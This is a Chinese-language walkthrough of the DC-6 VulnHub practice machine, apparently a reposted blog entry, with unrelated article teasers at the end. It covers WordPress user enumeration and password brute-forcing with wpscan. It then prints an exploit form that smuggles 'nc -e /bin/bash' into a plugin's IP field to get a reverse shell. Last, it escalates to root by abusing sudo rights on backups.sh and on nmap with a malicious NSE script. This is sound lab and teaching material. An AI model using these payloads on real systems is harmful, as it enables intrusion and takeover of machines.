DC-6靶机渗透测试

ops/2024/9/22 15:46:47/

DC-6靶机

文章目录

      • DC-6靶机
        • 信息收集
        • web渗透
        • 权限获取
        • 权限获取方式1 -- 利用45274.html
        • 权限获取方式2 -- 利用50110.py
        • 权限提升

信息收集
  1. 通过对靶机进行扫描,得出IP地址为192.168.78.134,开放端口为80 和 22 ssh,肯定会进行ssh连接的了

image-20230426192920171
在这里插入图片描述

  1. 访问网站,发现打不不开。根据nmap扫描和url提示,应该是需要添加域名wordy。修改/etc/hosts文件,添加主机192.168.78.134 wordy
    在这里插入图片描述

  2. 观看网站很明显优势wordpress框架,对网站进行扫描

image-20230426193249546

web渗透
  1. 获取了网站后台登录界面,继续生成可以利用得账号和密码

image-20230426193418454

  1. 使用wpscan --url wordy -e u,使用wpscan工具对wordpress网站扫描获取WordPress可以登录的用户

image-20230426195429773

  1. 使用cewl wordy -w DC5pd.txt 使用之前使用的cewl工具生成该网站的登录密码。

  2. 发现不能进行登录,重新打开https://www.vulnhub.com/entry/dc-6,315/,查看给的提示,获取密码字典的生成方式

OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.cat /usr/share/wordlists/rockyou.txt | grep k01 > DC5pd.txt    That should save you a few years. ;-)将/usr/share/wordlists下的rockyou.txt.gz解压缩,然后使用上面的语句,将rockyou转移到home/wfx文件夹内

image-20230426195714202

  1. 使用命令wpscan --url wordy -U DC5user.txt -P DC5pd.txt,使用wpscan工具对后台登录进行爆破登录,获取登录账密

image-20230426200253063

  1. 成功获取登录密码 markhelpdesk01,进行后台登录

image-20230426200408344

权限获取
  1. 突然多出来个小插件,发现一个插件Activity monitor,猜测这个插件存在漏洞,那就去找一找是否存在可以利用的漏洞,发现还真有,攻击一下试试。

image-20230426200905626

  1. 经过测试,发现msf并不能成功的利用该漏洞,尝试使用searchsploit去搜索相关的漏洞利用EXP
    在这里插入图片描述
权限获取方式1 – 利用45274.html
  1. 将漏洞利用文件保存到桌面,查看文件内容修改成自己的IP地址
searchsploit -m 45274.html
vim 45274.html
#在箭头1修改为域名地址
#箭头2修改为kali反弹shell命令
<html><form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data"><input type="hidden" name="ip" value="google.fr| nc -e /bin/bash 192.168.78.128 7777" />
</html> 

image-20230426204021211

  1. 将该html文件移动到unbantu的网站下
sudo service apache2 start  启动阿帕奇服务
cp 1.html /var/www/html/poc/a.html
  1. 登录乌邦图的网站查看该网页

image-20230615170108597

  1. 点击之后提交按钮,需要先进行登录操作,再重新登一下wordpress的后台,获取cookie

image-20230615170127991

  1. 点击提交之前,乌邦图主机需要监听本地7777端口,等待shell反弹 nc -lvp 7777,提交之后发现成功返回shell

#反弹shell成功,转换交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
/usr/bin/script -qc /bin/bash /dev/null

image-20230615170337625

权限获取方式2 – 利用50110.py
  1. 先将文件EXP文件保存到桌面
    在这里插入图片描述
  2. 直接执行EXP文件,根据提示输入IP,登陆的用户名和密码,直接返回了www-data的用户shell。直接EXP一把梭,比上面简单许多了
    在这里插入图片描述
  3. 尝试反弹shell到本地主机上
    在这里插入图片描述
权限提升
  1. 开始进行文件搜索,来到home文件夹内,发现了几个文件夹,其中mark中有graham用户名和密码
ls
cd /home
cd /home/mark
ls
cd stuff
cat *.txt
su - graham
输入密码  登陆到了garaham用户

image-20230615173237041

image-20230615173254506

  1. 查看当前用户权限,sudo -l 发现jens可以不需要密码执行backips.sh,那就使用sudo -u jens命令,就是使用jens来执行这个sh文件,前提先写入内容到sh文件夹内,写入/bin/bash,这样子使用jens用户执行该文件,就会得到jens的shell
sudo -l(jens) NOPASSWD: /home/jens/backups.sh
echo "/bin/bash">>/jens/backups.sh 
sudo -u jens /home/jens/backups.sh

image-20230615173720113

  1. 再次查看jens用户权限,发现可疑root权限免密使用nmap,这就要找到nmap漏洞了,其中nmap有–script=文件名 可以执行本地文件来进行漏洞扫描,所以可以在文件中写入获取shell操作,经过执行来获取root权限的shell
sudo -l(root) NOPASSWD: /usr/bin/nmap
cd /home/jens
echo "os.execute('/bin/bash')">>a.nse  //写入获取shell的命令
sudo /usr/home/nmap --script=a.nse

image-20230615174053007

  1. 获取了root权限,就可以来到root目录下,查看当前文件夹内容了,成功打开了flag文件,成功完成DC-6靶机
    image-20230615172310399

http://www.ppmy.cn/ops/89683.html

相关文章

Spring Cloud全解析:注册中心之Eureka服务下线

Eureka服务下线 默认情况下&#xff0c;如果Eureka Server在90s内没有收到Eureka客户端的续约&#xff0c;会将实例从注册表中删除&#xff0c;这样就会导致有时候客户端已经停止了运行&#xff0c;但是依然在注册中心列表中&#xff0c;导致访问该客户端报错 手动下线 可以…

C++ primer plus 第17 章 输入、输出和文件:使用 cin 进行输入

C primer plus 第17 章 输入、输出和文件&#xff1a;使用 cin 进行输入 C primer plus 第17 章 输入、输出和文件&#xff1a;使用 cin 进行输入 文章目录 C primer plus 第17 章 输入、输出和文件&#xff1a;使用 cin 进行输入17.3 使用 cin 进行输入17.3.1 cin>>如何…

[Day 44] 區塊鏈與人工智能的聯動應用:理論、技術與實踐

生成对抗网络&#xff08;Generative Adversarial Networks&#xff0c;GANs&#xff09;是一种由Ian Goodfellow等人在2014年提出的深度学习模型&#xff0c;广泛用于图像生成、图像超分辨率、图像修复等领域。GAN由一个生成器&#xff08;Generator&#xff09;和一个判别器&…

举例说明计算机视觉(CV)技术的优势和挑战

计算机视觉&#xff08;CV&#xff09;技术是一种利用计算机算法和技术来解析和理解图像和视频数据的领域。它的优势和挑战如下&#xff1a; 优势&#xff1a; 高速处理&#xff1a;计算机视觉可以快速处理大量的图像和视频数据&#xff0c;使得它在实时应用中非常有用。例如&…

认识VO、DTO、Entity

关于VO、DTO、Entity 概念 VO&#xff08;View Object&#xff09;&#xff1a;视图对象&#xff0c;专门用于前端展示层&#xff0c;专注于表示某个具体的值或对象的对象&#xff0c;包含业务逻辑&#xff1b;VO的作用是将一组数据以适合特定用户界面&#xff08;UI&#xf…

大数据应用【大数据导论】

各位大佬好 &#xff0c;这里是阿川的博客&#xff0c;祝您变得更强 个人主页&#xff1a;在线OJ的阿川 大佬的支持和鼓励&#xff0c;将是我成长路上最大的动力 阿川水平有限&#xff0c;如有错误&#xff0c;欢迎大佬指正 目录 大数据在许多领域应用互联网领域应用生物医学…

HarmonyOS NEXT——奇妙的调用方式

注解调用一句话总结Extend抽取特定组件样式、事件&#xff0c;可以传递参数Style抽取公共样式、事件&#xff0c;不可以传递参数Builder抽取结构、样式、事件&#xff0c;可以传递参数BuilderParams自定义组件中传递UI组件多个BuilderParams自定义组件中传递多个UI组件 Extend…

网络安全大模型开源项目有哪些?

01 Ret2GPT 它是面向CTF二进制安全的工具&#xff0c;结合ChatGPT API、Retdec和Langchain进行漏洞挖掘&#xff0c;它能通过问答或预设Prompt对二进制文件进行分析。 https://github.com/DDizzzy79/Ret2GPT 02 OpenAI Codex 它是基于GPT-3.5-turbo模型&#xff0c;用于编写…